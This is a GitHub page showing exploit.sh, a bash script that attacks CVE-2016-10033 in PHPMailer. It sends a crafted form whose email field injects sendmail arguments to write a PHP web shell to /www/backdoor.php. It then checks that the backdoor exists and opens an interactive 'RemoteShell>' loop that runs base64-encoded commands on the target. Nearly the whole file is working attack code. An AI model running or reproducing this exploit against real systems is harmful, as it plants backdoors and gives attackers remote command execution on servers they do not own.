-
-
Notifications
You must be signed in to change notification settings - Fork 147
/
exploit.sh
executable file
·55 lines (44 loc) · 1.91 KB
/
exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/bin/bash
# CVE-2016-10033 exploit by opsxcq
# https://github.com/opsxcq/exploit-CVE-2016-10033
echo '[+] CVE-2016-10033 exploit by opsxcq'
if [ -z "$1" ]
then
echo '[-] Please inform an host as parameter'
exit -1
fi
if [ $(uname) == 'Darwin' ]
then
decoder='base64 -D'
elif [ $(uname) == 'Linux' ]
then
decoder='base64 -d'
else
echo '[-] Your platform isnt supported: '$(uname)
exit -1
fi
host=$1
echo '[+] Exploiting '$host
curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\n\"vulnerables\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @test.com\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
echo '[+] Checking if the backdoor was created on target system'
code=$(curl -o /dev/null --silent --head --write-out '%{http_code}\n' "http://$host/backdoor.php")
if [ "$code" != "200" ]
then
echo '[-] Target cant be exploited'
exit -1
else
echo '[+] Backdoor.php found on remote system'
fi
cmd='whoami'
while [ "$cmd" != 'exit' ]
do
echo '[+] Running '$cmd
if ! curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | grep -v 'base64_encode' | head -n 1 | cut -d '|' -f 2 | $decoder
then
echo '[-] Connection problens'
exit -1
fi
echo
read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'